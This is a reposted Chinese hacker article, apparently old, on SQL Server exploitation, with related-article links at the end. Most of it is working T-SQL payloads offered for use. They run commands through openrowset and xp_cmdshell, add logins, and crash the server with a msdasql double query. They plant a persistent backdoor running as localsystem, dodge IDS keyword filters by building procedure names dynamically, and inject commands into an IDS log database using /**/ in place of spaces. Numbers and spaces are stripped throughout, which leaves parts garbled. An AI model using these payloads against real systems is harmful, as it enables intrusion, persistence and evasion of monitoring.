知识大全 sql server新漏洞和一些突破口
Posted 命令
篇首语:亦余心之所善兮,虽九死其犹未悔。本文由小常识网(cha138.com)小编为大家整理,主要介绍了知识大全 sql server新漏洞和一些突破口相关的知识,希望对你有一定的参考价值。
下面我要谈到一些sqlserver新的bug 虽然本人经过长时间的努力 当然也有点幸运的成分在内 才得以发现 不敢一个人独享 拿出来请大家鉴别 当然很有可能有些高手早已知道了 毕竟我接触sqlserver的时间不到 年 P
.关于openrowset和opendatasource 可能这个技巧早有人已经会了 就是利用openrowset发送本地命令 通常我们的用法是(包括MSDN的列子)如下 select * from openrowset( sqloledb myserver ; sa ; select * from table ) 可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问 它必须跟在select后面 也就是说需要返回一个recordset 那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的! select * from openrowset( sqloledb server ; sa ; set fmtonly off exec master dbo xp_cmdshel l dir c:\\ ) 必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置 这样xp_cmdshell返回的output集合就会提交给前面的select显示 如果采用默认设置 会返回空集合导致select出错 命令也就无法执行了 那么如果我们要调用sp_addlogin呢 他不会像xp_cmdshell返回任何集合的 我们就不能再依靠fmtonly设置了 可以如下操作 select * from openrowset( sqloledb server ; sa ; select OK! exec master dbo sp_addlogin Hectic ) 这样 命令至少会返回select OK! 的集合 你的机器商会显示OK! 同时对方的数据库内也会增加一个Hectic的账号 也就是说 我们利用select OK! 的返回集合欺骗了本地的select请求 是命令能够正常执行 通理sp_addsrvrolemember和opendatasource也可以如此操作!至于这个方法真正的用处 大家慢慢想吧 P
.关于msdasql两次请求的问题 不知道大家有没有试过用msdasql连接远程数据库 当然这个api必须是sqlserver的管理员才可以调用 那么如下 select * from openrowset( msdasql driver=sql server;server=server;address=server ;uid=sa;pwd=;database=master;neork=dbmssocn select * from table select * from table ) 当table 和table 的字段数目不相同时 你会发现对方的sqlserver崩溃了 连本地连接都会失败 而系统资源占用一切正常 用pskill杀死 sqlserver进程后 如果不重启机器 sqlserver要么无法正常启动 要么时常出现非法操作 我也只是碰巧找到这个bug的 具体原因我还没有摸透 而且很奇怪的是这个现象只出现在msdasql上 sqloledb就没有这个问题 看来问题不是在于请求集合数目和返回集合数目不匹配上 应该还是msdasql本身的问题 具体原因 大家一起慢慢研究吧 P
.可怕的后门 以前在网上看到有人说在sqlserver上留后门可以通过添加triger jobs或改写sp_addlogin和sp_addsrvrolemember做到 这些方法当然可行 但是很容易会被发现 不知道大家有没有想过sqloledb的本地连接映射 呵呵 比如你在对方的sqlserver上用sqlserver的管理员账号执行如下的命令 select * from openrowset( sqloledb trusted_connection=yes;data source=Hectic set fmtonly off exec master xp_cmdshell dir c:\\ ) 这样在对方的sqlserver上建立了一个名为Hectic的本地连接映射 只要sqlserver不重启 这个映射会一直存在下去 至少我现在还不知道如何发现别人放置的连接映射 好了 以上的命令运行过后 你会发现哪怕是sqlserver没有任何权限的guest用户 运行以上这条命令也一样能通过!而且权限是 localsystem!(默认安装)呵呵!这个方法可以用来在以被入侵过获得管理员权限的sqlserver上留下一个后门了 以上的方法在sqlserver +sqlserver SP 上通过!
另外还有一个猜测 不知道大家有没有注意过windows默认附带的两个dsn 一个是localserver一个是msqi 这两个在建立的时候是本地管理员账号连接sqlserver的 如果对方的sqlserver是通过自定义的power user启动 那么sa的权限就和power user一样 很难有所大作为 但是我们通过如下的命令 select * from openrowset( msdasql dsn=locaserver;trusted_connection=yes set fmtonly off exec master xp_cmdshell dir c:\\ )应该可以利用localserver的管理员账号连接本地sqlserver然后再以这个 账号的权限执行本地命令了 这是后我想应该能突破sa那个power user权限了 现在的问题是sqloledb无法调用dsn连接 而msdasql非管理员不让调用 所以我现在正在寻找guest调用msdasql的方法
如果有人知道这个bug如何突破 或有新的想法 我们可以一起讨论一下 这个发放如果能成功被guest利用 将会是一个很严重的安全漏洞 因为我们前面提到的任何sql语句都可以提交给对方的asp去帮我们执行 P
.利用t sql骗过ids或攻击ids
现在的ids已经变得越来越聪明了 有的ids加入了xp_cmdshell sp_addlogin 的监视 但是毕竟人工智能没有出现的今天 这种监视总是有种骗人的感觉 先说说欺骗ids: ids既然监视xp_cmdshell关键字 那么我们可以这么做 declare @a sysname set @a= xp_ + cmdshell exec @a dir c:\\ 这个代码相信大家都能看明白 还有xp_cmdshell作为一个store procedure在master库内有一个id号 固定的 我们也可以这么做 假设这个id= declare @a sysname select @a=name from sysobjects where id= exec @a dir c:\\ 当然也可以 declare @a sysname select @a=name from sysobjects where id= + exec @a dir c:\\ 这种做法排列组合 ids根本不可能做的到完全监视 同理 sp_addlogin也可以这么做 再说说攻击ids: 因为ids数据量很大 日至通常备份到常规数据库 比如sql server 如果用古老的recordset addnew做法 会严重影响ids的性能 因为通过ado做t sql请求 不但效率高 而且有一部分工作可以交给sql server 去做 通常程序会这么写 insert table values ( 日至内容 ) 那么我们想想看 如果用 temp ) exec xp_cmdshell dir c:\\ 提交后会变成 insert table values ( 日至内容 temp ) exec xp_cmdshell dir c:\\ ) 这样 xp_cmdshell就可以在ids的数据库运行了 ) 当然ids是一个嗅叹器 他会抓所有的报 而浏览器提交的时候会把空格变成% 因此 % 会被提交到sql server 这样你的命令就无法执行了 唯一的办法就是 insert/**/table/**/values( 日至内容 temp )/**/exec/**/xp_cmdshell/**/ dir c:\\ /**/ ) 用/**/代替空格做间隔符 这样你的t sql才能在ids的数据库内执行 当然也可以用其他语句 可以破坏 备份ids的数据库到你的共享目录 呵呵 其实这种方法的原理和攻击asp是一样的 只是把空格变成了/**/ 本来asp是select语句 那么用 就可以屏蔽 现在ids用insert语句 那么用 )屏蔽
cha138/Article/program/SQLServer/201311/22445相关参考
SQLServer2000的新特色 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 新的数据类型
MSSQL基础教程:SQLServer2000的新特性[1] 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看
MSSQL基础教程:SQLServer2000的新特性[4] 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看
MSSQL基础教程:SQLServer2000的新特性[3] 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看
MSSQL基础教程:SQLServer2000的新特性[2] 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看
浅析SQLServer2008企业级新特性 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! SQL
SQLServer2005SP1的新特性 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! SQLS
知识大全 SQL Server 2014新特性Data Explorer ForExcel的特点
SQLServer2014新特性DataExplorerForExcel的特点 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,
知识大全 SQL Server2012对于开发人员用的上的新特性
SQLServer2012对于开发人员用的上的新特性 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!
关于SQLServer问题的一些实用经验技巧 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! Sq